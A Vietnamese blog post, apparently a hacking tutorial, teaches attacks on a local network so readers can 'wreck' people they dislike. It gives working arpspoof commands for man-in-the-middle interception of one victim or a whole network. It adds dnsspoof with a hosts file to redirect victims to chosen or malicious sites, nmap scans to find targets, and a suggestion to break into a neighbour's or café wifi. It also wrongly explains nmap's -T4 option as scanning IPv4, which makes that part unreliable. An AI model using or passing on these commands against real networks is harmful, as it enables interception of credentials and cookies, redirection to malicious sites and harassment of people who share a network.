Lần này mình sẽ hướng dẫn các chiêu phá phách trong mạng LAN. Để nếu có ghét ai thì phá.

LAN là gì?

Không phải em Lan nhà hàng xóm mà LAN Local Area Network (mạng nội bộ), dễ hiểu là các thiết bị kết nối chung wifi là 1 mạng LAN.

LAN là gì?

Chuẩn bị

  • Backtrack 5/ Kali Linux
  • Kết nối mạng LAN (tất nhiên)
  • Victim (cái này hơi thừa)

Phương pháp

Phương pháp mình sử dụng là Man-in-the-middle (MITM), phương pháp này rất hữu dụng và nguy hiểm nếu hacker sử dụng giỏi. Bạn có thể:

  • Lấy được thông tin gửi đi từ máy victim (ID:pass, cookie, URL…)
  • Kiểm soát toàn bộ về mạng của victim, nói chung là ta làm chủ mạng.

Trong bài này mình sẽ hướng dẫn cách redirect mạng victim

Nguyên lý ở đây là ta sẽ mạo danh thành:

  • Đối với máy victim : ta giả làm router
  • Đối với router : ta giả làm máy victim

Test case

Trong bài viết này mình có 1 mạng LAN với:

  • Router (192.168.1.1)
  • Attacker (192.168.1.104)
  • Victim (192.168.1.117)

Lưu ý : các bạn muốn tìm được IP của victim

  • có thể hack wifi nhà hàng xóm/ quán cafe hoặc mượn được điện thoại/máy tính anh chị em
  • sử dụng các chương trình scan mạng
  • sử dụng Nmap có sẵn (hướng dẫn ở cuối bài)

MITM

Đầu tiên ta port forward IP để không DOS mạng LAN do sự cố (cái này mình chưa bị lần nào nhưng cứ cẩn thận vẫn hơn)

echo 1 > /proc/sys/net/ipv4/ip_forward

Trường hợp 1: Nhắm tới 1 victim (biết IP)

arpspoof -i <interface> -t <victim ip> <router ip>

<interface> : là card mạng sử dụng (thông thường là eth0 hoặc wlan0 với wifi). (dùng ifconfig để kiểm tra)

Mở terminal khác và gõ:

arpspoof -i <interface> -t <router ip> <victim ip>

Trường hợp 2: Nhắm đến toàn mạng

Trường hợp 2 cẩn thận nếu như nhiều người trong mạng quá có thể gây DOS.

arpspoof -i <interface> <router ip>

Redirect

Sau khi hoàn thành bước MITM ta tiếp tục đến phần phá phách:

Mình sẽ sử dụng phương pháp DNS Spoofing để redirect victim qua những website ta định sẵn:

Đầu tiên ta tạo 1 file txt theo cú pháp:

<ip> <website>
  • <ip> là IP của website redirect đến
  • <website> là những website bị redirect

Ví dụ:
127.0.0.1 google.com (redirect vào localhost tức chặn website)
-hoặc-
172.217.27.46 facebook.com (redirect facebook.com sang qua google.com)

ta có thể sử dụng dấu * nghĩa là “bao gồm toàn bộ”, chẳng hạn:

Ví dụ:
127.0.0.1 *.com (toàn bộ trang web có đuôi .com sẽ bị chuyển hướng)

Với cách này hacker có thể chuyển người dùng đến trang web độc hại.

dnsspoof -i <interface> -f <file text>

Xong!

Scan ip bằng Nmap

nmap -T4 -O <ip>/24
  • -T4 : chọn scan IPv4
  • -O : chọn scan hệ diều hành

Ví dụ: IP nhà mình bắt đầu bằng 192.168.0.xxx thì gõ:

nmap -T4 -O 192.168.0.0/24

lưu ý là ta gõ số 0 ở bit cuối cùng của IP, thay cho xx, còn “/24” là prefix, cứ gõ nó vào dể scan toàn bộ mạng.

Kết quả là bạn sẽ nhận được 1 list IP trong mạng và hệ điều hành, nếu scan được.

Lưu ý: dùng máy ảo vào Settings/Network chọn Bridged Adapter rồi chọn card mạng sử dụng (lý do nếu không khi tấn công máy victim sẽ mất kết nối internet)

Leave a Reply

This site uses cookies to offer you a better browsing experience. By browsing this website, you agree to our use of cookies.
x  Powerful Protection for WordPress, from Shield Security
This Site Is Protected By
Shield Security